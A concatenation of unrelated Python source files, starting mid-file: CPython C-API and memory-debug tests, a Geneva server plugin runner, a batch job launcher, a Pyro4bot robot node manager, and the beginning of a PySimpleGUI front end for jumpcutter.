with self.assertRaisesRegex(TypeError,
r'function takes at least 2 positional arguments \(1 given\)'):
parse((1,), {'a': 3}, 'OOO', ['', '', 'a'])
parse((1,), {}, 'O|OO', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 1 positional arguments \(0 given\)'):
parse((), {}, 'O|OO', ['', '', 'a'])
parse((1, 2), {'a': 3}, 'OO$O', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes exactly 2 positional arguments \(1 given\)'):
parse((1,), {'a': 3}, 'OO$O', ['', '', 'a'])
parse((1,), {}, 'O|O$O', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 1 positional arguments \(0 given\)'):
parse((), {}, 'O|O$O', ['', '', 'a'])
with self.assertRaisesRegex(SystemError, r'Empty parameter name after \$'):
parse((1,), {}, 'O|$OO', ['', '', 'a'])
with self.assertRaisesRegex(SystemError, 'Empty keyword'):
parse((1,), {}, 'O|OO', ['', 'a', ''])
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
if support.verbose:
print()
for name in dir(_testcapi):
if not name.startswith('test_'):
continue
with self.subTest("internal", name=name):
if support.verbose:
print(f" {name}", flush=True)
test = getattr(_testcapi, name)
test()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfb\n"
r" at tail\+2: 0xfb\n"
r" .*\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(sysconfig.get_config_var('WITH_PYMALLOC') == 1,
'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
plugin_server.py | import argparse
import threading
import multiprocessing
import os
import psutil
import socket
import sys
import time
BASEPATH = os.path.dirname(os.path.abspath(__file__))
PROJECT_ROOT = os.path.dirname(BASEPATH)
sys.path.append(PROJECT_ROOT)
import actions.sniffer
import engine
from plugins.plugin import Plugin
class ServerPlugin(Plugin):
"""
Defines superclass for each application plugin.
"""
def __init__(self):
self.enabled = True
self.server_proc = None
self.sniffer = None
self.engine = None
@staticmethod
def get_args(command):
"""
Defines required global args for all plugins
"""
# Do not add a help message; this allows us to collect the arguments from server plugins
parser = argparse.ArgumentParser(description='Server plugin runner', allow_abbrev=False, add_help=False)
parser.add_argument('--test-type', action='store', choices=actions.utils.get_plugins(), default="http", help="plugin to launch")
parser.add_argument('--environment-id', action='store', help="ID of the current environment")
parser.add_argument('--output-directory', action='store', help="Where to output results")
parser.add_argument('--no-engine', action="store_true",
help="Only run the test without the geneva engine")
parser.add_argument('--server-side', action="store_true", help="run the Geneva engine on the server side, not the client")
parser.add_argument('--strategy', action='store', default="", help='strategy to run')
parser.add_argument('--log', action='store', default="debug",
choices=("debug", "info", "warning", "critical", "error"),
help="Sets the log level")
parser.add_argument('--port', action='store', type=int, help='port to run this server on')
parser.add_argument('--external-server', action='store_true', help="use an external server for testing.")
parser.add_argument('--sender-ip', action='store', help="IP address of sending machine, used for NAT")
parser.add_argument('--forward-ip', action='store', help="IP address to forward traffic to")
parser.add_argument('--routing-ip', action='store', help="routing IP for this computer for server-side evaluation.")
parser.add_argument('--public-ip', action='store', help="public facing IP for this computer for server-side evaluation.")
parser.add_argument('--no-wait-for-server', action='store_true', help="disable blocking until the server is bound on a given port")
parser.add_argument('--wait-for-shutdown', action='store_true', help="monitor for the <eid>.shutdown_server flag to shutdown this server.")
args, _ = parser.parse_known_args(command)
return vars(args)
def start(self, args, logger):
"""
Runs this plugin.
"""
logger.debug("Launching %s server" % self.name)
output_path = os.path.join(PROJECT_ROOT, args["output_directory"])
eid = args["environment_id"]
use_engine = not args.get("no_engine", False)
port = args["port"]
server_side = args["server_side"]
log_level = args["log"]
strategy = args.get("strategy", "")
assert port, "Need to specify a port in order to launch a sniffer"
forwarder = {}
# If NAT options were specified to train as a middle box, set up the engine's
# NAT configuration
if args.get("sender_ip"):
assert args.get("forward_ip")
assert args.get("sender_ip")
assert args.get("routing_ip")
forwarder["forward_ip"] = args["forward_ip"]
forwarder["sender_ip"] = args["sender_ip"]
forwarder["routing_ip"] = args["routing_ip"]
pcap_filename = os.path.join(output_path, "packets", eid + "_server.pcap")
# We cannot use the context managers as normal here, as this method must return and let the evaluator continue
# doing its thing. If we used the context managers, they would be cleaned up on method exit.
# Start a sniffer to capture traffic that the plugin generates
self.sniffer = actions.sniffer.Sniffer(pcap_filename, int(port), logger).__enter__()
# Conditionally initialize the engine
self.engine = engine.Engine(port, strategy, server_side=True, environment_id=eid, output_directory=output_path, log_level=args.get("log", "info"), enabled=use_engine, forwarder=forwarder).__enter__()
# Run the plugin
self.server_proc = multiprocessing.Process(target=self.start_thread, args=(args, logger))
self.server_proc.start()
# Create a thread to monitor if we need to
if args.get("wait_for_shutdown"):
threading.Thread(target=self.wait_for_shutdown, args=(args, logger)).start()
# Shortcut wait for server if a plugin has disabled it
if args.get("no_wait_for_server"):
return
# Block until the server has started up
self.wait_for_server(args, logger)
def start_thread(self, args, logger):
"""
Calls the given run function, designed to be run in a separate process.
"""
self.run(args, logger)
def wait_for_server(self, args, logger):
"""
Waits for server to startup - returns when the server port is bound to by the server.
"""
logger.debug("Monitoring for server startup on port %s" % args["port"])
max_wait = 30
count = 0
while count < max_wait:
if count % 10 == 0:
logger.debug("Waiting for server port binding")
# Bind TCP socket
try:
with socket.socket() as sock:
sock.bind(('', int(args["port"])))
except OSError:
break
time.sleep(0.5)
count += 1
else:
logger.warn("Server never seemed to bind to port")
return
self.write_startup_file(args, logger)
def write_startup_file(self, args, logger):
"""
Writes a flag file to disk to signal to the evaluator it has started up
"""
# Touch a file to tell the evaluator we are ready
flag_file = os.path.join(PROJECT_ROOT, args["output_directory"], "flags", "%s.server_ready" % args["environment_id"])
open(flag_file, "a").close()
logger.debug("Server ready.")
def wait_for_shutdown(self, args, logger):
"""
Checks for the <eid>.server_shutdown flag to shutdown this server.
"""
flag_file = os.path.join(PROJECT_ROOT, args["output_directory"], "flags", "%s.server_shutdown" % args["environment_id"])
while True:
if os.path.exists(flag_file):
break
time.sleep(0.5)
logger.debug("Server for %s shutting down." % args["environment_id"])
self.stop()
logger.debug("Server %s stopped." % args["environment_id"])
def stop(self):
"""
Terminates the given process.
"""
self.engine.__exit__(None, None, None)
self.sniffer.__exit__(None, None, None)
# In order to clean up all the child processes a server may have started,
# iterate over all of the process children and terminate them
proc = psutil.Process(self.server_proc.pid)
for child in proc.children(recursive=True):
child.terminate()
proc.terminate()
def punish_fitness(self, fitness, logger):
"""
Punish fitness.
"""
return actions.utils.punish_fitness(fitness, logger, self.engine)
def main(command):
"""
Used to invoke the server plugin from the command line.
"""
# Must use the superclasses arg parsing first to figure out the plugin to use
plugin = ServerPlugin.get_args(command)["test_type"]
# Import that plugin
mod, cls = actions.utils.import_plugin(plugin, "server")
# Ask the plugin to parse the args
plugin_args = cls.get_args(command)
# Instantiate the plugin
server_plugin = cls(plugin_args)
# Define a logger and launch the plugin
with actions.utils.Logger(plugin_args["output_directory"], __name__, "server", plugin_args["environment_id"], log_level=plugin_args["log"]) as logger:
server_plugin.start(plugin_args, logger)
if __name__ == "__main__":
main(sys.argv[1:])
|
run_multiprocess.py | import os
import argparse
import subprocess
import multiprocessing
parser = argparse.ArgumentParser()
parser.add_argument("-n", type=int, help="number of processes")
args = parser.parse_args()
root = "/mnt/data1/chengdi/nb201/"
cmds = []
for i in range(15625):
cmds.append("python3 dse_p.py -m {} -i ./cifar10.json -b ./vu9p.json -o {} --parallel -dt 1".format(
os.path.join(root, "models", f"{i}.model"), os.path.join(root, "dse_dt1", str(i))))
queue = multiprocessing.Queue(maxsize=args.n)
def _worker(pid, queue):
while 1:
token = queue.get()
if token is None:
break
_, cmd = token
print("Process #{}: CMD: {}".format(pid, cmd))
subprocess.check_call(cmd, shell=True)
print("Process #{} end".format(pid))
for pid in range(args.n):
p = multiprocessing.Process(target=_worker, args=(pid, queue))
p.start()
for i_cmd, cmd in enumerate(cmds):
queue.put((i_cmd, cmd))
# close all the workers
for _ in range(args.n):
queue.put(None)
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
from test import test_support
try:
import thread
import threading
except ImportError:
thread = None
threading = None
import _testcapi
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and test_support.verbose:
print "(%i)"%(len(l),),
for i in xrange(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and test_support.verbose:
print "(%i)"%(len(l),)
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and test_support.verbose:
print "finished threads: ", nFinished
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
@unittest.skipUnless(threading and thread, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@test_support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(thread.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
def test_main():
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if test_support.verbose:
print "internal", name
try:
test()
except _testcapi.error:
raise test_support.TestFailed, sys.exc_info()[1]
test_support.run_unittest(TestPendingCalls, TestThreadState)
if __name__ == "__main__":
test_main()
|
node.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ____________developed by paco andres____________________
# ________in collaboration with cristian vazquez _________
import os
import time
from node.libs import config, control, utils, uriresolver
from multiprocessing import Process, Pipe, Queue
import threading
import traceback
import Pyro4
from termcolor import colored
import setproctitle
from node.libs.inspection import inspecting_modules
import pprint
# show_warnings(_modules_libs_errors)
_LOCAL_TRYS = 5
_REMOTE_TRYS = 5
_classes_lib, _modules_libs_errors = inspecting_modules("node.libs")
def import_class(services, components):
""" Import necessary packages for Robot"""
print(colored("\n____________IMPORTING CLASS FOR ROBOT______________________",
'yellow'))
print(" SERVICES:")
for module, cls in services:
try:
print(colored(" FROM {} IMPORT {}".format(module, cls), "cyan"))
exec("from {} import {}".format(module, cls), globals())
except Exception:
print("ERROR IMPORTING CLASS: {} FROM MODULE {}".format(cls, module))
traceback.print_exc()
exit(0)
print(" COMPONENTS:")
for module, cls in components:
try:
print(colored(" FROM {} IMPORT {}".format(module, cls), "cyan"))
exec("from {} import {}".format(module, cls), globals())
except Exception:
print("ERROR IMPORTING CLASS: {} FROM MODULE {}".format(cls, module))
traceback.print_exc()
exit(0)
print("")
class Robot(control.Control):
"""Main class Manage the robot."""
def __init__(self):
super(Robot, self).__init__()
# Dictionary of components
self.PROCESS = {}
# Import objects needed to instantiate components
import_class(*self.imports)
# Resolution of URIs for Pyro
self.URI_proxy = None # URIProxy for internal uri resolver
self.URI_uri = None # Just URI for
self.URI_object = self.load_uri_resolver() # Object resolver location
def load_uri_resolver(self):
"""Load the URIs resolver on main node."""
uri_r = uriresolver.uriresolver(self.node,
password=self.node["password"])
self.URI_uri, self.URI_proxy = uri_r.register_uriresolver()
return uri_r
def start_components(self):
"""Launcher of node components."""
# Decoration
print(colored("\t|", "yellow"))
print(colored("\t|", "yellow"))
print(colored("\t+-----> SERVICES", "yellow"))
self.load_objects(self.services, self.services_order)
# Decoration
print(colored("\t|", "yellow"))
print(colored("\t|", "yellow"))
print(colored("\t+-----> COMPONENTS", "yellow"))
self.load_objects(self.components, self.components_order)
def load_objects(self, parts, object_robot):
"""Execute the components or services of the node."""
for k in object_robot:
parts[k]["_local_trys"] = _LOCAL_TRYS
parts[k]["_remote_trys"] = _REMOTE_TRYS
parts[k]["_services_trys"] = _LOCAL_TRYS
parts[k]["_unresolved_locals"] = list(parts[k].get("_locals", []))
parts[k]["_unr_remote_deps"] = list(
parts[k].get("_resolved_remote_deps", []))
parts[k]["_unresolved_services"] = list(
parts[k].get("_services", []))
parts[k]["_non_required"] = self.check_requireds(parts[k])
errors = False
for k in object_robot:
if parts[k]["_non_required"]:
print(colored("ERROR: class {} require {} for {} ".
format(parts[k]["cls"], parts[k]["_non_required"], k), "red"))
errors = True
if errors:
exit()
while object_robot != []:
k = object_robot.pop(0)
st_local, st_remote, st_service = self.check_deps(k, parts[k])
if st_local == "ERROR":
print("\t\t[%s] NOT STARTING %s Error in locals %s" % (
colored(st_local, 'red'), k, parts[k]["_unresolved_locals"]))
continue
if "ERROR" in st_remote:
print("\t\t[{}] {} {} --> {}".format(
colored("ERROR", 'red'),
colored("NOT STARTING:", 'red'),
k,
colored("".join(parts[k]["_unr_remote_deps"]), 'red')))
continue
if st_service == "ERROR":
print("\t\t[%s] NOT STARTING %s Error in service %s" % (
colored(st_remote, 'red'), k, parts[k]["_unresolved_services"]))
continue
if st_local == "WAIT" or st_remote == "WAIT" or st_service == "WAIT":
object_robot.append(k)
continue
if st_local == "OK" and st_service == "OK":
parts[k].pop("-->", None)
parts[k]["_REMOTE_STATUS"] = st_remote
del (parts[k]["_unresolved_locals"])
del (parts[k]["_local_trys"])
del (parts[k]["_unresolved_services"])
del (parts[k]["_services_trys"])
del (parts[k]["_remote_trys"])
self.pre_start_pyro4bot_object(k, parts[k])
def check_deps(self, k, obj):
"""Check the dependencies of the robot."""
obj["_locals"] = []
obj["_resolved_remote_deps"] = []
obj["_services"] = []
check_local = self.check_local_deps(obj)
check_services = self.check_service_deps(obj)
check_remote = self.check_remotes(k, obj)
return check_local, check_remote, check_services
def check_local_deps(self, obj):
"""Check the local dependencies of the robot."""
check_local = "OK"
for d in obj["_unresolved_locals"]:
uri = self.URI_proxy.wait_local_available(d, self.node["password"])
if uri is not None:
obj["_locals"].append(uri)
else:
obj["_local_trys"] -= 1
if obj["_local_trys"] < 0:
check_local = "ERROR"
break
else:
check_local = "WAIT"
break
return check_local
def check_service_deps(self, obj):
"""Check the services dependencies of the robot."""
check_service = "OK"
for d in obj["_unresolved_services"]:
uri = self.URI_proxy.wait_local_available(d, self.node["password"])
if uri is not None:
obj["_services"].append(uri)
else:
obj["_services_trys"] -= 1
if obj["_services_trys"] < 0:
check_service = "ERROR"
break
else:
check_service = "WAIT"
break
return check_service
def check_remotes(self, k, obj):
"""Check the remotes dependencies of the robot."""
check_remote = "OK"
for d in obj["_unr_remote_deps"]:
msg, uri = self.URI_proxy.wait_resolv_remotes(d, k)
if "WAIT" == msg:
obj["_remote_trys"] -= 1
if obj["_remote_trys"] < 0:
check_remote = "WAITING"
else:
check_remote = "WAIT"
time.sleep(1)
elif "ERROR" == msg:
check_remote = "ERROR"
obj["_remote_trys"] = 0
elif "SYNC" == msg:
print("\t\t" + colored("*REMOTE-URI", 'green') + ":{} for comp:{}".format(uri, d))
check_remote = "OK"
obj["_remote_trys"] = 0
obj["_resolved_remote_deps"].append(uri)
if d in obj["_unr_remote_deps"]:
obj["_unr_remote_deps"].remove(d)
elif "ASYNC" == msg:
check_remote = "ASYNC"
obj["_remote_trys"] = 0
else:
check_remote = "UNKNOWN-ERROR"
obj["_remote_trys"] = 0
return check_remote
def pre_start_pyro4bot_object(self, name, obj):
"""Pre starter for component."""
serv_pipe, client_pipe = Pipe()
attemps = 5
if "_locals" not in obj:
obj["_locals"] = []
if "_resolved_remote_deps" not in obj:
obj["_resolved_remote_deps"] = []
if name not in self.PROCESS:
self.PROCESS[name] = []
obj["pyro4id"] = self.URI_proxy.new_uri(name, obj["mode"])
obj["name"] = name
obj["node"] = self.uri_node
obj["uriresolver"] = self.URI_uri
obj["tty_out"] = self.node["tty_out"]
obj["tty_err"] = self.node["tty_err"]
obj["tty_node"] = utils.get_tty()
self.PROCESS[name].append(obj["pyro4id"])
self.PROCESS[name].append(
Process(name=name, target=self.start_pyro4bot_object, args=(obj, client_pipe)))
self.PROCESS[name][1].start()
self.PROCESS[name].append(self.PROCESS[name][1].pid)
self.PROCESS[name].append(obj["_REMOTE_STATUS"])
status = serv_pipe.recv()
status = "FAIL"
while attemps > 0:
try:
pxy = utils.get_pyro4proxy(
obj["pyro4id"], self.node["name"])
status = pxy.get_status()
break
except Exception:
attemps -= 1
time.sleep(1)
if status == "OK":
st = colored(status, 'green')
self.PROCESS[name].append(pxy.__docstring__())
if status == "FAIL":
st = colored(status, 'red')
if status == "WAITING":
st = colored(status, 'yellow')
if status == "ASYNC":
print("\t\t[%s] STARTING %s --> remotes dependencies in asynchronous mode with --> %s" % (
colored(status, 'yellow'), name, colored(' '.join(obj["_unr_remote_deps"]), 'yellow')))
else:
print("\t\t[%s] STARTING %s" % (st, obj["pyro4id"]))
else:
print("ERROR: " + name + " is running")
def start_pyro4bot_object(self, d, proc_pipe):
"""Start PYRO4BOT component."""
(name_ob, ip, ports) = utils.uri_split(d["pyro4id"])
try:
# Daemon proxy for sensor
daemon = Pyro4.Daemon(
host=ip, port=utils.get_free_port(ports, ip=ip))
daemon._pyroHmacKey = self.node["password"].encode()
proc_pipe.send("CONTINUE")
deps = utils.prepare_proxys(d, self.node["password"])
# assinging tty out and err for object
default_tty = utils.get_tty()
utils.set_tty_err(d["tty_err"])
# Preparing class for pyro4
pyro4bot_class = control.Pyro4bot_Loader(
globals()[d["cls"]], **deps)
new_object = pyro4bot_class()
# Associate object to the daemon
uri = daemon.register(new_object, objectId=name_ob)
# Get and save exposed methods
exposed = Pyro4.core.DaemonObject(
daemon).get_metadata(name_ob, True)
# Hide methods from Control
safe_exposed = {}
for k in exposed.keys():
safe_exposed[k] = list(
set(exposed[k]) - set(dir(control.Control)))
safe_exposed["methods"].extend(["__docstring__", "__exposed__"])
new_object.exposed.update(safe_exposed)
setproctitle.setproctitle("PYRO4BOT." + name_ob)
# Save dosctring documentation inside sensor object
new_object.docstring.update(
self.get_docstring(new_object, safe_exposed))
daemon.requestLoop()
# getting tty default to exit
utils.set_tty_out(default_tty)
utils.set_tty_err(default_tty)
print("[%s] Shutting %s" %
(colored("Down", 'green'), d["pyro4id"]))
except Exception as e:
proc_pipe.send("FAIL")
print("ERROR: creating sensor robot object: " + d["pyro4id"])
print(utils.format_exception(e))
def get_docstring(self, new_object, exposed):
"""Return doc_string documentation in methods_and_docstring."""
docstring = {}
for key in [x for x in exposed.keys() if x in ["methods", "oneway"]]:
for m in exposed[key]:
if m not in (dir(control.Control)): # Exclude control methods
d = eval("new_object." + str(m) + ".__doc__")
docstring[m] = d
return docstring
def get_class_REQUIRED(self, cls):
"""Return a list of requirements if cls has __REQUIRED class attribute."""
try:
dic_cls = eval("{0}.__dict__['_{0}__REQUIRED']".format(cls))
return dic_cls
except Exception:
return []
def check_requireds(self, obj):
"""
For a given obj this method calc requirements class and
get unfulfilled requirements for an obj
inside _service and _local find on left side string.
"""
requireds = self.get_class_REQUIRED(obj["cls"])
connectors = obj.get("_services", []) + obj.get("_locals", [])
keys = list(obj.keys()) + obj.get("_resolved_remote_deps", [])
unfulfilled = [req for req in requireds if req not in
[con.split(".")[1] for con in connectors] + keys]
return unfulfilled
def register_node(self):
"""Register main node on nameserver."""
self.URI_proxy.register_robot_on_nameserver(self.uri_node)
# Exposed methods (Publics)
@Pyro4.expose
def get_uris(self, node=False):
"""Return the URI of all the components of the robot."""
return self.URI_proxy.list_uris(node)
@Pyro4.expose
def get_name_uri(self, name):
"""Return the URI of the given name as a component.
@name: string.
Follow the following format: "robotname.component"
"""
if name in self.PROCESS:
uri = self.URI_proxy.get_uri(name)
status = self.PROCESS[name][3]
return uri, status
else:
return None, "Not found"
@Pyro4.expose
def shutdown(self):
print(colored("____STOPPING PYRO4BOT %s_________" %
self.node["name"], "yellow"))
for k, v in self.PROCESS.items():
try:
v[1].terminate()
except Exception:
raise
print("[{}] {}".format(colored("Down", 'green'), v[0]))
@Pyro4.expose
def print_process(self, onlyChanges=False):
for k, v in self.PROCESS.items():
# Update status
try:
old_status = v[3]
v[3] = utils.get_pyro4proxy(
v[0], self.node["name"]).get_status()
except Exception:
v[3] = "FAIL"
if (onlyChanges and v[3] != old_status) or not onlyChanges:
if v[3] == "OK":
st = colored(v[3], 'green')
elif v[3] == "FAIL":
st = colored(v[3], 'red')
elif v[3] == "WAITING" or v[3] == "ASYNC":
st = colored(v[3], 'yellow')
print("[{}]\t{} {}".format(
st, str(v[2]), str(v[0]).rjust(60, ".")))
@Pyro4.expose
def status_changed(self):
self.print_process(onlyChanges=True)
@Pyro4.expose
def My_Pid(self):
print(self.PROCESS)
|
jumpcutter_gui_threaded.py | import PySimpleGUI as sg
import subprocess
import sys
import threading
print(sg.version)
help_text = \
"""
Jumpcutter GUI
This is a front-end GUI for a command line tool named jumpcutter.
jumpcutter is a command line based tool written by Carykh. You'll find the repo here:
https://github.com/carykh/jumpcutter
The design of this GUI was made in a way that should not have required any changes to the
jumpcutter.py file. However, there appears to be a bug in the original code. The sample rate
argument was specified as a float, but this later causes a crash in the program, so a single
change was made to line 68, changing the parameter from a float to an int. You can get around
this change by not specifying a default value in this GUI. Rather than specifying 44100, leave it blank
which will cause the parameter to be skipped.
This kind of GUI can be applied to a large number of other commandline programs.
NOTE - it has not yet been tested on Linux. It's only been tested on Windows. Hoping to get it
tested out on Linux shortly.
KNOWN Problem - filenames with spaces. Working on it. For now, make a temp folder and make sure everything
has no spaces and you'll be fine. YouTube download wasn't working on the video I tried
Copyright 2020 PySimpleGUI.org
"""
version = '24 May 2021'
def FText(text, in_key=None, default=None, tooltip=None, input_size=None, text_size=None):
"""
A "User Defined Element" - Fixed-sized Text Input. Returns a row with a Text and an Input element.
Modify to expose more or less parameters. Avoid **kwargs so that parameters are named.
"""
if input_size is None:
input_size = (20, 1)
if text_size is None:
text_size = (20, 1)
return [sg.Text(text, size=text_size, justification='r', tooltip=tooltip),
sg.Input(default_text=default, key=in_key, size=input_size, tooltip=tooltip)]
'''
M""""""""M dP dP
Mmmm mmmM 88 88
MMMM MMMM 88d888b. 88d888b. .d8888b. .d8888b. .d888b88
MMMM MMMM 88' `88 88' `88 88ooood8 88' `88 88' `88
MMMM MMMM 88 88 88 88. ... 88. .88 88. .88
MMMM MMMM dP dP dP `88888P' `88888P8 `88888P8
MMMMMMMMMM
'''
def the_thread(window: sg.Window, sp: subprocess.Popen):
"""
The thread that's used to run the subprocess so that the GUI can continue and the stdout/stderror is collected
:param window:
:param sp:
:return:
"""
window.write_event_value('-THREAD-', (sp, '===THEAD STARTING==='))
window.write_event_value('-THREAD-', (sp, '----- STDOUT Follows ----'))
for line in sp.stdout:
oline = line.decode().rstrip()
window.write_event_value('-THREAD-', (sp, oline))
window.write_event_value('-THREAD-', (sp, '----- STDERR ----'))
for line in sp.stderr:
oline = line.decode().rstrip()
window.write_event_value('-THREAD-', (sp, oline))
window.write_event_value('-THREAD-', (sp, '===THEAD DONE==='))
def main():
# This version of the GUI uses this large dictionary to drive 100% of the creation of the
# layout that collections the parameters for the command line call. It's really simplistic
# at the moment with a tuple containing information about each entry.
# The definition of the GUI. Defines:
# PSG Input Key
# Tuple of items needed to build a line in the layout
# 0 - The command line's parameter
# 1 - The text to display next to input
# 2 - The default value for the input
# 3 - Size of input field (None for default)
# 4 - Tooltip string
# 5 - List of additional elements to include on the same row
input_defintion = {
'-FILE-': ('--input_file', 'Input File', '', (40, 1), 'the video file you want modified', [sg.FileBrowse()]),
'-URL-': ('--url', 'URL (not yet working)', '', (40, 1), 'A youtube url to download and process', []),
'-OUT FILE-': ('--output_file', 'Output File', '', (40, 1), "the output file. (optional. if not included, it'll just modify the input file name)", [sg.FileSaveAs()]),
'-SILENT THRESHOLD-': ('--silent_threshold', 'Silent Threshold', 0.03, None,
"the volume amount that frames' audio needs to surpass to be consider \"sounded\". It ranges from 0 (silence) to 1 (max volume)", []),
'-SOUNDED SPEED-': ('--sounded_speed', 'Sounded Speed', 1.00, None, "the speed that sounded (spoken) frames should be played at. Typically 1.", []),
'-SILENT SPEED-': ('--silent_speed', 'Silent Speed', 5.00, None, "the speed that silent frames should be played at. 999999 for jumpcutting.", []),
'-FRAME MARGIN-': ('--frame_margin', 'Frame Margin', 1, None,
"some silent frames adjacent to sounded frames are included to provide context. How many frames on either the side of speech should be included? That's this variable.",
[]),
'-SAMPLE RATE-': ('--sample_rate', 'Sample Rate', 44100, None, "sample rate of the input and output videos", []),
'-FRAME RATE-': (
'--frame_rate', 'Frame Rate', 25, None, "frame rate of the input and output videos. optional... I try to find it out myself, but it doesn't always work.", []),
'-FRAME QUALITY-': ('--frame_quality', 'Frame Quality', 3, None, "quality of frames to be extracted from input video. 1 is highest, 31 is lowest, 3 is the default.", [])
}
# the command that will be invoked with the parameters
command_to_run = r'python A:\TEMP2020\jumpcutter\jumpcutter.py '
command_to_run = r'A:\TEMP2020\jumpcutter\jumpcutter.py '
# Find longest input descrption which is index 1 in table
text_len = max([len(input_defintion[key][1]) for key in input_defintion])
# Top part of layout that's not table driven
layout = [[sg.Text('Jump Cutter - Compress Silence in a Video', font='Any 20')]]
# Computed part of layout that's based on the dictionary of attributes (the table driven part)
for key in input_defintion:
layout_def = input_defintion[key]
line = FText(layout_def[1], in_key=key, default=layout_def[2], tooltip=layout_def[4], input_size=layout_def[3], text_size=(text_len, 1))
if layout_def[5] != []:
line += layout_def[5]
layout += [line]
# Bottom part of layout that's not table driven
layout += [[sg.Text('Constructed Command Line:')],
[sg.Text(size=(80, 4), key='-COMMAND LINE-', text_color='yellow', font='Courier 8')],
[sg.Text('Command Line Output:')],
